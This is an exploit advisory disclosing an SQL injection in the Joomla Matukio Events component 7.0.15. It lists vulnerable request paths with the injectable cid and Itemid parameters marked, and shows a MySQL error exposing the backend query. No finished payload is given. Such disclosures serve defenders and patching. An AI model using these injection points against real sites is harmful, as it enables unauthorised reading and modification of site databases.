####################################################################

# Exploit Title : Joomla Matukio Events Components 7.0.15 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/02/2019
# Vendor Homepage : compojoom.com
# Software Download Link : matukio.compojoom.com
# Software Information Link : extensions.joomla.org/extension/matukio-events/
compojoom.com/joomla-extensions/matukio-events-management-made-easy
# Software Version : 7.0.15 and previous versions
# Software Price : Paid Download
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Matukio Events -  The all in one events and webinar solution for Joomla. 

From event management and presentation, over flexible booking forms, till payment processing!

####################################################################

# Impact :
***********
Joomla Matukio Events Components 7.0.15 [ and other versions ] component for Joomla is 

prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied 

data before using it in an SQL query. Exploiting this issue could allow an attacker 

to compromise the application, access or modify data, or exploit latent vulnerabilities 

in the underlying database. A remote attacker can send a specially crafted request 

to the vulnerable application and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?tmpl=component&option=com_matukio&view=ics&format=raw

/index.php/en/?option=com_matukio&view=ics&format=raw

/index.php?option=com_matukio&view=participantlist&cid=[SQL Injection]

/index.php?option=com_matukio&view=calendar&Itemid=[SQL Injection]

/index.php?option=com_matukio&view=participantlist&cid=[ID-NUMBER]&Itemid=[SQL Injection]

####################################################################

# Example SQL Database Error :
****************************
#1064 You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the right syntax to use near 'cur.id as curid, 
cur.title as curtitle, cur.sign as currencySign, cur.posi' at line 2 SQL=SELECT 
a.*, r.*, cat.title AS category cur.id as curid, cur.title as curtitle, cur.sign as currencySign, 
cur.position as currencyPosition, cur.decimalsign as decimalSign, cur.payment_
code as payment_code, IF(r.override_title IS NULL or r.override_title =
 '', a.title, r.override_title) as title, IF(r.override_maxpupil IS NULL or r.override_maxpupil
 = '', a.maxpupil, r.override_maxpupil) as maxpupil FROM #__matukio_recurring 
AS r LEFT JOIN #__matukio AS a ON r.event_id = a.id LEFT JOIN 
#__categories AS cat ON cat.id = a.catid LEFT JOIN #__matukio_currencies AS 
cur ON cur.id = a.currency_id WHERE r.published = '1' AND r.end >
 '' AND r.booked > '' AND cat.access IN (1,1) ORDER BY r.begin DESC LIMIT 0, 1000

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################